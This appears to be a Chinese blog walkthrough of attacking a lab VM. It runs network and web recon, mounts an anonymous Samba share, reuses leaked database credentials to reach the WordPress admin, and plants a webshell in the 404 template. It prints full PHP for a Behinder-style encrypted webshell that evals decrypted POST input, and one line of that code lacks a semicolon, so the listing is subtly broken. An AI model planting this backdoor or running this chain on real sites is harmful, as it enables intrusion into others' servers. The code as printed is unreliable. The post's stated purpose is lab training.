浅谈常见渗透测试流程

admin 2024年2月17日00:10:01评论14 views字数 1318阅读4分23秒阅读模式

本文,我们通过一个简单的靶场环境来说说常见渗透的思路吧!

导入靶场环境

我们首先下载靶场文件,并导入到vm中。

浅谈常见渗透测试流程
浅谈常见渗透测试流程
导入并启动靶场

信息收集

将虚拟机的网络设置为桥接模式。保证和kali处于同一网段。

01 获取IP地址

现在我们需要知道目标主机的IP地址。我们在kali中用netdiscover工具扫描即可。

netdiscover -i eth0 -r 192.168.123.1/24

浅谈常见渗透测试流程02 端口扫描

在上一步中,我们成功获得目标的IP地址。接下来我们需要对该IP进行端口扫描。命令如下

nmap -T4 -A 192.168.123.206

通过扫描,我们发现目标开启了ssh http 文件共享(可能) mysql等服务。

浅谈常见渗透测试流程

渗透测试

01 对web站点测试

我们访问IP地址,发现是个web站点。

浅谈常见渗透测试流程扫描站点目录,看是否存在敏感文件。

dirb http://192.168.123.206

浅谈常见渗透测试流程如上图,我们发现了info.php phpmyadmin wp等敏感程序目录。

浅谈常见渗透测试流程
浅谈常见渗透测试流程

浅谈常见渗透测试流程既然是wp程序,我们用wpscan神器走一波。

wpscan --url http://192.168.123.206/wordpress/

浅谈常见渗透测试流程遗憾的是我们并没有发现有用的信息。

02 samba服务

在刚才的扫描中,我们发现了目标开启了445端口。可能存在文件共享服务。我们可以利用enum4linux枚举运行samba的主机。命令如下:

enum4linux 192.168.123.206

浅谈常见渗透测试流程聪明的你会发现,目标主机运行空密码登录。浅谈常见渗透测试流程

挂载目录到本地。

mount -t cifs -o username=’’,password=’’ //192.168.123.206/share$ /mnt

浅谈常见渗透测试流程我们发现,目录应该是挂载到了web站点下。

03 柳暗花明又一村

通过对前面web站点的扫描,我们并没有得到有用的信息。但是通过smb服务,我们发现目标直接挂载到了站点目录。通过对站点目录的读取,我们顺利得到了数据库的配置文件。

浅谈常见渗透测试流程

浅谈常见渗透测试流程用得到用户名与密码尝试登录phpmyadmin,成功登录

浅谈常见渗透测试流程但是当我用账号查看wp的数据库却发现没有权限。浅谈常见渗透测试流程会不会数据库的账号就是后台的账号呢?通过尝试果然登录进了后台。

浅谈常见渗透测试流程接下来,我们在wp后台,点击编辑404模板。写入一句话。

浅谈常见渗透测试流程这里,我们通过冰蝎进行连接。

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="5ca7cc00083ed022"
    $bs="base64_"."decode";
 $after=$bs($data."");
 for($i=0;$i<strlen($after);$i++) {
     $after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
@eval($post);
?>
浅谈常见渗透测试流程

注意

本文所题技术仅用学习参考,坚决反对一切危害网络安全的行为。造成后果自行承担,与本文无关。后台回复【靶场】获取文本靶场。

原文始发于微信公众号(kali笔记):浅谈常见渗透测试流程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日00:10:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浅谈常见渗透测试流程https://cn-sec.com/archives/2150614.html

发表评论

匿名网友 填写信息